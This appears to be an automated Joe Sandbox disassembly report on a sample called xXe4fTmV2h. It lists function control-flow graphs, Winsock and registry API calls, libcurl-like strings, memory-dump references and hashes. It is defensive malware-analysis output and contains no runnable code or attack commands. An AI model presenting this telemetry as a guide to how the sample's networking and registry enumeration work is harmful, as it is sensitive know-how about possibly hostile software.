                                      control_flow_graph 1272 c38b50-c38b69 1273 c38be6 1272->1273 1274 c38b6b-c38b74 1272->1274 1277 c38be9 1273->1277 1275 c38b76-c38b8d 1274->1275 1276 c38beb-c38bf2 1274->1276 1278 c38bf3-c38bfe call c3a550 1275->1278 1279 c38b8f-c38ba7 call c16e40 1275->1279 1277->1276 1284 c38de4-c38def 1278->1284 1285 c38c04-c38c08 1278->1285 1286 c38cd9-c38d16 SleepEx getsockopt 1279->1286 1287 c38bad-c38baf 1279->1287 1288 c38df5-c38e19 call c3a150 1284->1288 1289 c38e8c-c38e95 1284->1289 1290 c38c0e-c38c1d 1285->1290 1291 c38dbd-c38dc3 1285->1291 1294 c38d22 1286->1294 1295 c38d18-c38d20 1286->1295 1292 c38ca6-c38cb0 1287->1292 1293 c38bb5-c38bb9 1287->1293 1330 c38e1b-c38e26 1288->1330 1331 c38e88 1288->1331 1296 c38f00-c38f06 1289->1296 1297 c38e97-c38e9c 1289->1297 1299 c38c35-c38c48 call c3a150 1290->1299 1300 c38c1f-c38c30 connect 1290->1300 1291->1277 1292->1286 1301 c38cb2-c38cb8 1292->1301 1293->1276 1302 c38bbb-c38bc2 1293->1302 1303 c38d26-c38d39 1294->1303 1295->1303 1296->1276 1306 c38edf-c38eef call c078b0 1297->1306 1307 c38e9e-c38eb6 call c12a00 1297->1307 1332 c38c4d-c38c4f 1299->1332 1300->1299 1309 c38cbe-c38cd4 call c3b180 1301->1309 1310 c38ddc-c38dde 1301->1310 1302->1276 1311 c38bc4-c38bcc 1302->1311 1304 c38d43-c38d61 call c1d8c0 call c3a150 1303->1304 1305 c38d3b-c38d3d 1303->1305 1334 c38d66-c38d74 1304->1334 1305->1304 1305->1310 1327 c38ef2-c38efc 1306->1327 1307->1306 1329 c38eb8-c38edd call c13410 * 2 1307->1329 1309->1284 1310->1277 1310->1284 1317 c38bd4-c38bda 1311->1317 1318 c38bce-c38bd2 1311->1318 1317->1276 1325 c38bdc-c38be1 1317->1325 1318->1276 1318->1317 1333 c38dac-c38db8 call c450a0 1325->1333 1327->1296 1329->1327 1336 c38e28-c38e2c 1330->1336 1337 c38e2e-c38e85 call c1d090 call c44fd0 1330->1337 1331->1289 1338 c38c51-c38c58 1332->1338 1339 c38c8e-c38c93 1332->1339 1333->1276 1334->1276 1343 c38d7a-c38d81 1334->1343 1336->1331 1336->1337 1337->1331 1338->1339 1346 c38c5a-c38c62 1338->1346 1341 c38c99-c38c9f 1339->1341 1342 c38dc8-c38dd9 call c3b100 1339->1342 1341->1292 1342->1310 1343->1276 1349 c38d87-c38d8f 1343->1349 1351 c38c64-c38c68 1346->1351 1352 c38c6a-c38c70 1346->1352 1354 c38d91-c38d95 1349->1354 1355 c38d9b-c38da1 1349->1355 1351->1339 1351->1352 1352->1339 1358 c38c72-c38c8b call c450a0 1352->1358 1354->1276 1354->1355 1355->1276 1360 c38da7 1355->1360 1358->1339 1360->1333
                                      APIs
                                      • connect.WS2_32(?,?,00000001), ref: 00C38C30
                                      • SleepEx.KERNELBASE(00000000,00000000), ref: 00C38CF3
                                      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00C38D0E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: Sleepconnectgetsockopt
                                      • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                      • API String ID: 1669343778-879669977
                                      • Opcode ID: a140feca7259f2950887532b8a59de1d1689b7cf8acf831a13be4c1e57ebff6c
                                      • Instruction ID: eed8ac5cc5a8ce5560771fbc468df81d9562a8e236c2c54eaf851f8cc70a46fd
                                      • Opcode Fuzzy Hash: a140feca7259f2950887532b8a59de1d1689b7cf8acf831a13be4c1e57ebff6c
                                      • Instruction Fuzzy Hash: C8B1E174614306AFDB10DF24DC85BA6BBE0AF45318F04852CF8694B2D2DB70ED58CB62
                                      Function 00C02F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1458 c02f17-c02f8c call 10898f0 call 1089ce0 1463 c031c9-c031cd 1458->1463 1464 c02f91-c02ff4 call c01619 RegOpenKeyExA 1463->1464 1465 c031d3-c031d6 1463->1465 1468 c031c5 1464->1468 1469 c02ffa-c0300b 1464->1469 1468->1463 1470 c0315c-c031ac RegEnumKeyExA 1469->1470 1471 c03010-c03083 call c01619 RegOpenKeyExA 1470->1471 1472 c031b2-c031c2 RegCloseKey 1470->1472 1475 c03089-c030d4 RegQueryValueExA 1471->1475 1476 c0314e-c03152 1471->1476 1472->1468 1477 c030d6-c03137 call 1089bc0 call 1089c50 call 1089ce0 call 1089af0 call 1089ce0 call 1088050 1475->1477 1478 c0313b-c0314b RegCloseKey 1475->1478 1476->1470 1477->1478 1478->1476
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: d
                                      • API String ID: 1332880857-2564639436
                                      • Opcode ID: 42f173ced592e10f70cd875d4af32ef196483a035463bc7df7e169e40261cdd5
                                      • Instruction ID: 0dabaca2ecce77d21e215f981905354ba60341f53e4ee5b8c2a46208c28d5cd5
                                      • Opcode Fuzzy Hash: 42f173ced592e10f70cd875d4af32ef196483a035463bc7df7e169e40261cdd5
                                      • Instruction Fuzzy Hash: 9D7198B490831A9FDB14EF69D58479EBBF0BF84308F10885DE498A7340D7749A89CF92
                                      Function 00C39290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1491 c39290-c392ed call c076a0 1494 c393c3-c393ce 1491->1494 1495 c392f3-c392fb 1491->1495 1504 c393d0-c393e1 1494->1504 1505 c393e5-c39427 call c1d090 call c44f40 1494->1505 1496 c39301-c39333 call c1d8c0 call c1d9a0 1495->1496 1497 c393aa-c393af 1495->1497 1515 c393a7 1496->1515 1516 c39335-c39364 WSAIoctl 1496->1516 1498 c39456-c39470 1497->1498 1499 c393b5-c393bc 1497->1499 1502 c39429-c39431 1499->1502 1503 c393be 1499->1503 1509 c39433-c39437 1502->1509 1510 c39439-c3943f 1502->1510 1503->1498 1504->1499 1511 c393e3 1504->1511 1505->1498 1505->1502 1509->1498 1509->1510 1510->1498 1514 c39441-c39453 call c450a0 1510->1514 1511->1498 1514->1498 1515->1497 1519 c39366-c3936f 1516->1519 1520 c3939b-c393a4 1516->1520 1519->1520 1523 c39371-c39390 setsockopt 1519->1523 1520->1515 1523->1520 1524 c39392-c39395 1523->1524 1524->1520
                                      APIs
                                      • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00C3935D
                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00C39389
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: Ioctlsetsockopt
                                      • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                      • API String ID: 1903391676-2691795271
                                      • Opcode ID: a218ffbec21eba9c13bf5d973cfa028330cfd6eecceea9759ad2c3f0c3574699
                                      • Instruction ID: ab9d014ff0b7d5a76d3cded72ee26325f9b7f407197c03618a1929c6897bf10a
                                      • Opcode Fuzzy Hash: a218ffbec21eba9c13bf5d973cfa028330cfd6eecceea9759ad2c3f0c3574699
                                      • Instruction Fuzzy Hash: 6A51F571A00305ABE714DF24C881FAAB7A5FF85314F148529FD588B292E770EA91CB91
                                      Function 00C076A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1525 c076a0-c076be 1526 c076c0-c076c7 1525->1526 1527 c076e6-c076f2 send 1525->1527 1526->1527 1530 c076c9-c076d1 1526->1530 1528 c076f4-c07709 call c072a0 1527->1528 1529 c0775e-c07762 1527->1529 1528->1529 1531 c076d3-c076e4 1530->1531 1532 c0770b-c07759 call c072a0 call c0cb20 call f88c50 1530->1532 1531->1528 1532->1529
                                      APIs
                                      • send.WS2_32(multi.c,?,?,?,00C03D4E,00000000,?,?,00C107BF), ref: 00C076EB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: send
                                      • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                      • API String ID: 2809346765-3388739168
                                      • Opcode ID: 5d32d342d558c6521bb47d5785f380504ac94d7464fc397fa716a9c9e22f8e50
                                      • Instruction ID: c086c79198c716cf42834a637b639b91fa6e82994fd8abae6c4c42518c2d1121
                                      • Opcode Fuzzy Hash: 5d32d342d558c6521bb47d5785f380504ac94d7464fc397fa716a9c9e22f8e50
                                      • Instruction Fuzzy Hash: 2B110DF5E193157BD124A719EC8AE373B5CDB82B68F450B0CBC2557341D651AD01C2B2
                                      Function 00C07770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1644 c07770-c0778e 1645 c07790-c07797 1644->1645 1646 c077b6-c077c2 recv 1644->1646 1645->1646 1649 c07799-c077a1 1645->1649 1647 c077c4-c077d9 call c072a0 1646->1647 1648 c0782e-c07832 1646->1648 1647->1648 1651 c077a3-c077b4 1649->1651 1652 c077db-c07829 call c072a0 call c0cb20 call f88c50 1649->1652 1651->1647 1652->1648
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: recv
                                      • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                      • API String ID: 1507349165-640788491
                                      • Opcode ID: 02dca4111f40b2b28b475ac0a78dd165197845c3af1fa2882cf0d06b602f9570
                                      • Instruction ID: e3118d94685d8f9fb821e66a36335a27601364c2cdadeb6e7d24bc085ebaa036
                                      • Opcode Fuzzy Hash: 02dca4111f40b2b28b475ac0a78dd165197845c3af1fa2882cf0d06b602f9570
                                      • Instruction Fuzzy Hash: E4112BF5E093047BE124A719EC4AF273B6CDB86B98F45071CB81452382D620AC01C6F2
                                      Function 00C075E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1663 c075e0-c075ed 1664 c07607-c07629 socket 1663->1664 1665 c075ef-c075f6 1663->1665 1667 c0762b-c0763c call c072a0 1664->1667 1668 c0763f-c07642 1664->1668 1665->1664 1666 c075f8-c075ff 1665->1666 1669 c07601-c07602 1666->1669 1670 c07643-c07699 call c072a0 call c0cb20 call f88c50 1666->1670 1667->1668 1669->1664
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: socket
                                      • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                      • API String ID: 98920635-842387772
                                      • Opcode ID: 5e16b9b2242d0b303c08fa1617fd12a472967eed1619afc8f6b66127893738d6
                                      • Instruction ID: cd60c54da8bf92e585cc14c71ac956f8d2a265996f635860190dee0f093cad05
                                      • Opcode Fuzzy Hash: 5e16b9b2242d0b303c08fa1617fd12a472967eed1619afc8f6b66127893738d6
                                      • Instruction Fuzzy Hash: 7F1129B6E0521277D620672DEC4AF8B3B58EB81735F450A18F830923D2D712DD55D3D2
                                      Function 00C3A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1772 c3a150-c3a159 1773 c3a250 1772->1773 1774 c3a15f-c3a17b 1772->1774 1775 c3a181-c3a1ce getsockname 1774->1775 1776 c3a249-c3a24f 1774->1776 1777 c3a1d0-c3a1f5 call c1d090 1775->1777 1778 c3a1f7-c3a214 call c3ef30 1775->1778 1776->1773 1786 c3a240-c3a246 call c44f40 1777->1786 1778->1776 1783 c3a216-c3a23b call c1d090 1778->1783 1783->1786 1786->1776
                                      APIs
                                      • getsockname.WS2_32(?,?,00000080), ref: 00C3A1C7
                                      Strings
                                      • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00C3A23B
                                      • getsockname() failed with errno %d: %s, xrefs: 00C3A1F0
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                      • API String ID: 3358416759-2605427207
                                      • Opcode ID: 3510f17550ef4d1105bbbd0e2de6feed25bc6bf413c82aa754104c7a3d711ea4
                                      • Instruction ID: a2337e6cba911f3e723a6b0c5a5666b1c5bcc746d393b915c0232a64b40fd7c8
                                      • Opcode Fuzzy Hash: 3510f17550ef4d1105bbbd0e2de6feed25bc6bf413c82aa754104c7a3d711ea4
                                      • Instruction Fuzzy Hash: 02210A71818280BAF7259729DC42FE7B7BCEF95324F040614F99853051FB326A8587E2
                                      Function 00C1D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1792 c1d5e0-c1d5ee 1793 c1d5f0-c1d604 call c1d690 1792->1793 1794 c1d652-c1d662 WSAStartup 1792->1794 1800 c1d606-c1d614 1793->1800 1801 c1d61b-c1d651 call c27620 1793->1801 1796 c1d670-c1d676 1794->1796 1797 c1d664-c1d66f 1794->1797 1796->1793 1799 c1d67c-c1d68d 1796->1799 1800->1801 1806 c1d616 1800->1806 1806->1801
                                      APIs
                                      • WSAStartup.WS2_32(00000202), ref: 00C1D65A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: Startup
                                      • String ID: if_nametoindex$iphlpapi.dll
                                      • API String ID: 724789610-3097795196
                                      • Opcode ID: 2e16f5ebb56e106e96170ae76dd6f9c13b3c2db0ab7d282d460095f21a2a41c1
                                      • Instruction ID: 0d032889ef048cec69ed2cfd3a88ef5502138b222f3de1000eff52fa02f0788e
                                      • Opcode Fuzzy Hash: 2e16f5ebb56e106e96170ae76dd6f9c13b3c2db0ab7d282d460095f21a2a41c1
                                      • Instruction Fuzzy Hash: E50126D0D4138157E721BB38E91B3E635902B53304F85187CF8999619AFB69CAC8D2A3
                                      Function 00CCAA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
